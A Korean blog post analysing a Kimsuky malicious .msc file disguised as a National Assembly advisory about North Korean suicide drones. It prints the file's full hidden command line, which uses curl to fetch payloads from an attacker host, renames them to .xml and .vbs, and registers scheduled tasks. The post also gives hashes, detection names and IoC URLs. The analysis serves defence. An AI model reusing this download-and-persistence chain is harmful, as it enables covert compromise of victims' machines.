Kimsuky(김수키) 대한민국 국회 보안 문서 [자문]북한 신형 자폭드론 으로 위장한 악성코드(2024.9.12)
오늘은 북한 APT Kimsuky(김수키)에서 만든 대한민국 국회 보안 문서 [자문]북한 신형 자폭드론 으로 위장한 악성코드(2024.9.12)에 대해 글을 적어보겠습니다.
일단 실행을 하면 북한 신형 자폭 드론 으로 돼 있으며 당시 러시아-우크라이나 전쟁으로 뜨거웠던 내용 인지라 해당 관련해서 노렸던 것 같습니다.
일단 msc 확장자로 되어져 있으며 8~9월 당시 악성코드라서 지금은 구글 문서 쪽은 동작 안 할 것입니다.
파일명:[자문]북한 신형 자폭드론.msc
사이즈:146,707 Bytes
MD5:391fa4e57f91e3422ef5d32523d4dfc7
SHA-1:f535a3faed62e48d588e190f372785ae9efcadb4
SHA-256:57e9b7d1c18684a4e8b3688c454e832833e063019ed808fd69186c4e20df930a
악성코드 내부 내용
<Task Type="CommandLine" Command="cmd.exe">
<String Name="Name" ID="13"/>
<String Name="Description" ID="14"/>
<Symbol>
<Image Name="Small" BinaryRefIndex="6"/>
<Image Name="Large" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Directory="" WindowState="Minimized" Params="/c mode 15,1&curl -o "c:\users\public\music\default1" "hxxps://petssecondchance(.)larcity.dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam1"&curl -o "c:\users\public\pictures\default1" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam1"&move /y "c:\users\public\music\default1" "c:\users\public\music\default1.xml"&start explorer "hxxps://docs(.)google(.)com/document/d/1Z96Gq8lf7h688L0GeZMgAhjipRX1GLmL/edit"(&)amp;schtasks /create /tn TerminalServiceUpdater /xml c:\users\public\music\default1.xml /f&curl -o "c:\users\public\music\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam2"&curl -o "c:\users\public\pictures\default2" "hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam2"&move /y "c:\users\public\music\default2" "c:\users\public\music\default2.xml"&move /y "c:\users\public\pictures\default1" "c:\users\public\pictures\default1.vbs"&schtasks /create /tn TermServiceUpdater /xml c:\users\public\music\default2.xml /f&move /y "c:\users\public\pictures\default2" "c:\users\public\pictures\default2(.)vbs""/>
</Task>
코드 분석
WindowState:명령어 실행 시 최소화된 상태로 창이 실행되도록 설정해서 악성코드 사용자는 이게 악성코드 실행이 되었는지 눈치 채지 못함
주요 명령어
curl을 사용한 악성코드 내려받기
curl 명령어:
외부 URL에서 파일을 다운로드하는 명령어
파일 저장 위치는 C:\Users\Public\music 및 C:\Users\Public\pictures 로 설정되어 있으며
공용 디렉터리 사용
웹 경로가 CSS 파일로 위장되어 있지만 실제로는 악성 코드 또는 스케줄러 설정 파일 목적
파일 이름 및 확장자 변경
다운로드한 파일의 이름과 확장자를 변경
주요 변경사항:
default1->default1.xml:작업 스케줄러용 XML 파일로 사용
default1->default1(.)vbs:VBScript 파일로 실행될 가능성이 큼
목적:
.XML: 작업 스케줄러에서 읽어 실행하는 설정 파일
.vbs:시스템에서 직접 실행 가능한 스크립트
Google Docs 페이지 열기
start explorer:
기본 웹 브라우저를 열어 특정 Google Docs 페이지 오픈
사용자가 문서의 내용을 확인하도록 유도 공격자의 존재를 숨기기 위한 위장일 수도 있음
작업 스케줄러 등록
schtasks 명령어:
Windows 작업 스케줄러에 새로운 작업을 생성
XML 파일(default1.xml,default2.xml)을 사용해 작업의 구성 정보를 제공
시스템이 부팅되거나 특정 조건에서 자동으로 악성 파일을 실행하도록 설정
두 개의 작업(TerminalServiceUpdater,TermServiceUpdater)을 등록
파일 경로를 보면 각각 default1(.)xml,default2(.)xml 을 실행
추가 다운로드와 파일 실행
추가 파일 다운로드:
URL 경로가 조금 다를 뿐 처음 다운로드한 파일과 유사한 방식으로 작동
default2 파일도 작업 스케줄러 등록 및 실행을 위해 준비
그러면 구글 문서를 통해서 보면 대충 다음과 같습니다.
조선중앙통신은 8월26일 북한 국방과학원 무인기연구소가 개발 중인 일부 자폭드론의 성능을 김정은(꿀꿀이)에게 시연했다고 발표했다.보도내용에서는 세부적인 특성을 제시하지 않았고 외형도 모자이크 영상처리를 하였다.그러나 확인 가능한 부분만 보면 러시아와 이스라엘의 드론과 유사하다.
공개한 영상에는 두 가지 유형의 자폭드론을 시험하는 모습이 나타나 있다.이스라엘 Uvision Air 의 히어로(Hero) 계열 자폭드론과 유사한 단일 캐니스터 발사식과IAI 이스라엘 항공우주산업의 하릅(Harop) 과 유사한 캐터펄트 발사식 자폭드론이다.이런식으로 돼 있는 문서를 볼 수가 있습니다.
즉 일단 악성코드 다운로드 및 미끼 파일을 보여주고 사용자를 속이는 방식을 사용하고 있습니다.
일단 기본적으로 microsoft management console snap-in control file 즉 msc 등으로 공격하는 수법도 있으니 조심하는 것을 권장하면 보통은 exe 같은 형식으로도 오기도 합니다.
바이러스토탈에서 탐지하는 업체들은 다음과 같습니다. 물론 해당 부분은 실제와 달라질 수가 있습니다.
AhnLab-V3:Downloader/XML.Kimsuky.S2867
AliCloud:Trojan[downloader]:Unknow/KimSuky.AO8PHU
ALYac:Trojan.Downloader.Agent.XML
Arcabit:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
BitDefender:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
CTX:Xml.trojan.kimsuky
DrWeb:XML.Downloader.5
Emsisoft:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE (B)
eScan:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
ESET-NOD32:XML/TrojanDownloader.Agent.T
GData:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
Google:Detected
Huorong:TrojanDownloader/XML.Agent.c
Ikarus:Trojan-Downloader.XML.Agent
Kingsoft:Script.Troj.Generic.2026995
Lionic:Trojan.Script.Kimsuky.4!c
Microsoft:Trojan:XML/KimSuky.AZ!MTB
Sophos:Mal/XMLDwn-DZ
Symantec:Trojan Horse
Tencent:Win32.Trojan-Downloader.Der.Xwhl
Trellix (HX):Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
TrendMicro:TROJ_FRS.VSNTID24
TrendMicro-HouseCall:TROJ_FRS.VSNTID24
Varist:ABDownloader.DSDG
VIPRE:Dump:Generic.MSC.Kimsuky.A.FFFFFFFE
VirIT:Trojan.MSC.Heur.A
ViRobot:Downloader.S.MSC.146707
IoC(Indicator of Compromise)
C:\Users\Public\Music\default1
C:\Users\Public\Music\default2
C:\Users\Public\Pictures\default1
C:\Users\Public\Pictures\default2
파일 확장자 변경
default1.xml
default2.xml
default1.vbs
default2.vbs
URL
hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam1
hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=sam1
hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css(.)php?na=xam2
hxxps://petssecondchance(.)larcity(.)dev/modules/mod_custom/tmpl/andy/css.php?na=sam2\
vbs 파일 마이크로소프트에서 알아서 시간 되면 사용 못 하게 숙청시킨다고 하니 그때까지는 악용될 가능성이 매우 큽니다. 그리고 나는 애플의 맥(Mac)사용 하는데 상관없다고 하시는 분들이 계실 것인데 요즈음 북한도 판을 계속 키우면서 악성코드 및 취약점을 찾고 야생에서 악용되는 취약점을 악용하니 귀찮더라고 최신 업데이트를 하시는 것과 별도의 비용이 발생할지 모르겠지만, 애플 맥 용 안티 바이러스(백신프로그램)을 사용을 하는 것을 매우 권장 드립니다.
아무튼, 이리저리 질러 보고 있으니 대북 관련, 탈북만 분들, 방산, 가상화폐(암호화폐), 네이버 피싱 사이트 등 위장 해서 뿌리고 있으니 항상 조심하길 바라겠습니다.